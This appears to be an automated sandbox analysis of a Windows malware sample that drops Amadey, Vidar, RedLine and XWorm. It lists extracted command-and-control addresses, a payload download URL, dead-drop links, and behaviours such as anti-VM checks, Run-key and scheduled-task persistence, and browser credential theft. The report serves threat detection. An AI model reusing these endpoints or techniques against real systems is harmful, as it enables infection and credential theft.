Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 07:26
Static task
static1
Behavioral task
behavioral1
Sample
f6860e04c99e9e38430b00d86e75bb2c.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
f6860e04c99e9e38430b00d86e75bb2c.exe
Resource
win10v2004-20250217-en
General
-
Target
f6860e04c99e9e38430b00d86e75bb2c.exe
-
Size
938KB
-
MD5
f6860e04c99e9e38430b00d86e75bb2c
-
SHA1
074ed995aabe1d0c65658eb9eeab39ec3ca975dc
-
SHA256
fc8add9758dbcc75ede35c3523929552359ff353921d79a299a0abc339c8a1ec
-
SHA512
194edd616acbace1b206e928e39bd301a2e4ca01928888a5d054afa394ff3758afec905ce227b8aed91c0b9f67a1eac73c0d5ee3c1e90ce420dfb90623555144
-
SSDEEP
24576:LqDEvCTbMWu7rQYlBQcBiT6rprG8a0F7u:LTvC/MTQYxsWR7a0F7
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
redline
testproliv
45.155.103.183:1488
Extracted
xworm
5.0
127.0.0.1:6666
5.180.155.29:6666
O3GT6cT0bZJp53nK
-
Install_directory
%Temp%
-
install_file
winservice.exe
Signatures
-
Amadey family
-
Detect Vidar Stealer 8 IoCs
resource yara_rule behavioral2/memory/1904-472-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-474-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-588-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-589-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-594-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-596-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-599-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1904-617-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2352-553-0x0000016F6A640000-0x0000016F6A66A000-memory.dmp family_xworm -
Gcleaner family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/836-494-0x000001C59E4A0000-0x000001C59E4F2000-memory.dmp family_redline -
Redline family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9684a95687.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 12c607b539.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8dd497d5ab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0781f1c15c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a808e3c99.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE -
Blocklisted process makes network request 3 IoCs
flow pid Process 25 5052 powershell.exe 40 1184 powershell.exe 41 3636 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 5052 powershell.exe 1184 powershell.exe 3636 powershell.exe 4496 powershell.exe 2388 powershell.exe 2344 powershell.exe -
Downloads MZ/PE file 21 IoCs
flow pid Process 39 3004 rapes.exe 39 3004 rapes.exe 39 3004 rapes.exe 39 3004 rapes.exe 39 3004 rapes.exe 39 3004 rapes.exe 92 4920 BitLockerToGo.exe 119 1188 BitLockerToGo.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 120 3004 rapes.exe 25 5052 powershell.exe 40 1184 powershell.exe 41 3636 powershell.exe 268 5488 8dd497d5ab.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1536 chrome.exe 5448 msedge.exe 5844 msedge.exe 4608 chrome.exe 4276 chrome.exe 5144 chrome.exe 4048 chrome.exe 2156 msedge.exe 5076 msedge.exe 1504 msedge.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0009000000023dcc-460.dat net_reactor behavioral2/memory/4352-470-0x0000000000840000-0x00000000008A0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0781f1c15c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9684a95687.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a808e3c99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 12c607b539.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8dd497d5ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a808e3c99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9684a95687.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0781f1c15c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 12c607b539.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8dd497d5ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation OEHBOHk.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winservice.lnk OEHBOHk.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winservice.lnk OEHBOHk.exe -
Executes dropped EXE 31 IoCs
pid Process 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 3004 rapes.exe 3648 rapes.exe 964 28bc9d64cc.exe 740 Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE 4816 0781f1c15c.exe 836 483d2fa8a0d53818306efeb32d3.exe 3376 ce2f96f45b.exe 4756 ce2f96f45b.exe 868 ce2f96f45b.exe 1880 9684a95687.exe 2312 3a808e3c99.exe 716 12c607b539.exe 4048 rapes.exe 3960 z3SJkC5.exe 828 z3SJkC5.exe 5076 WiseTurbo.exe 3432 WiseTurbo.exe 836 BXxKvLN.exe 4352 mAtJWNv.exe 1904 mAtJWNv.exe 2192 zY9sqWs.exe 3868 v6Oqdnc.exe 2352 OEHBOHk.exe 2536 MCxU5Fj.exe 4408 MCxU5Fj.exe 2956 FvbuInU.exe 5544 Ps7WqSx.exe 3344 rapes.exe 2564 winservice.exe 5488 8dd497d5ab.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 0781f1c15c.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 9684a95687.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 3a808e3c99.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 12c607b539.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine 8dd497d5ab.exe -
Loads dropped DLL 4 IoCs
pid Process 828 z3SJkC5.exe 5076 WiseTurbo.exe 3432 WiseTurbo.exe 3032 WatcherUpdate_test.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\28bc9d64cc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10099760101\\28bc9d64cc.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10099770121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winservice = "C:\\Users\\Admin\\AppData\\Local\\Temp\\winservice.exe" OEHBOHk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8dd497d5ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10100300101\\8dd497d5ab.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d75-56.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 3004 rapes.exe 3648 rapes.exe 740 Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE 4816 0781f1c15c.exe 836 483d2fa8a0d53818306efeb32d3.exe 1880 9684a95687.exe 2312 3a808e3c99.exe 716 12c607b539.exe 4048 rapes.exe 3868 v6Oqdnc.exe 2956 FvbuInU.exe 3344 rapes.exe 5488 8dd497d5ab.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3376 set thread context of 868 3376 ce2f96f45b.exe 130 PID 4816 set thread context of 4920 4816 0781f1c15c.exe 142 PID 716 set thread context of 1188 716 12c607b539.exe 145 PID 3432 set thread context of 2280 3432 WiseTurbo.exe 157 PID 4352 set thread context of 1904 4352 mAtJWNv.exe 161 PID 2536 set thread context of 4408 2536 MCxU5Fj.exe 173 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4860 3376 WerFault.exe 128 4172 828 WerFault.exe 150 3776 828 WerFault.exe 150 3664 4352 WerFault.exe 160 1716 2536 WerFault.exe 171 -
System Location Discovery: System Language Discovery 1 TTPs 47 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 28bc9d64cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0781f1c15c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a808e3c99.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WiseTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce2f96f45b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WiseTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce2f96f45b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9684a95687.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 12c607b539.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8dd497d5ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6860e04c99e9e38430b00d86e75bb2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1016 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856333290341646" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 836 schtasks.exe 3988 schtasks.exe 4396 schtasks.exe 4364 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2352 OEHBOHk.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5052 powershell.exe 5052 powershell.exe 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 3004 rapes.exe 3004 rapes.exe 3648 rapes.exe 3648 rapes.exe 1184 powershell.exe 1184 powershell.exe 4496 powershell.exe 4496 powershell.exe 4496 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe 3636 powershell.exe 3636 powershell.exe 3636 powershell.exe 740 Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE 740 Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE 4816 0781f1c15c.exe 4816 0781f1c15c.exe 836 483d2fa8a0d53818306efeb32d3.exe 836 483d2fa8a0d53818306efeb32d3.exe 1880 9684a95687.exe 1880 9684a95687.exe 868 ce2f96f45b.exe 868 ce2f96f45b.exe 868 ce2f96f45b.exe 868 ce2f96f45b.exe 1880 9684a95687.exe 1880 9684a95687.exe 1880 9684a95687.exe 1880 9684a95687.exe 2312 3a808e3c99.exe 2312 3a808e3c99.exe 2312 3a808e3c99.exe 2312 3a808e3c99.exe 2312 3a808e3c99.exe 2312 3a808e3c99.exe 716 12c607b539.exe 716 12c607b539.exe 4048 rapes.exe 4048 rapes.exe 5076 WiseTurbo.exe 3432 WiseTurbo.exe 3432 WiseTurbo.exe 836 BXxKvLN.exe 836 BXxKvLN.exe 2280 cmd.exe 2280 cmd.exe 2192 zY9sqWs.exe 2192 zY9sqWs.exe 2192 zY9sqWs.exe 2192 zY9sqWs.exe 3868 v6Oqdnc.exe 3868 v6Oqdnc.exe 3868 v6Oqdnc.exe 3868 v6Oqdnc.exe 3868 v6Oqdnc.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3432 WiseTurbo.exe 2280 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 3868 msedge.exe 3868 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 3376 ce2f96f45b.exe Token: SeDebugPrivilege 2352 OEHBOHk.exe Token: SeDebugPrivilege 2352 OEHBOHk.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeShutdownPrivilege 4608 chrome.exe Token: SeCreatePagefilePrivilege 4608 chrome.exe Token: SeDebugPrivilege 2564 winservice.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 964 28bc9d64cc.exe 964 28bc9d64cc.exe 964 28bc9d64cc.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 4608 chrome.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 5448 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe -
Suspicious use of SendNotifyMessage 30 IoCs
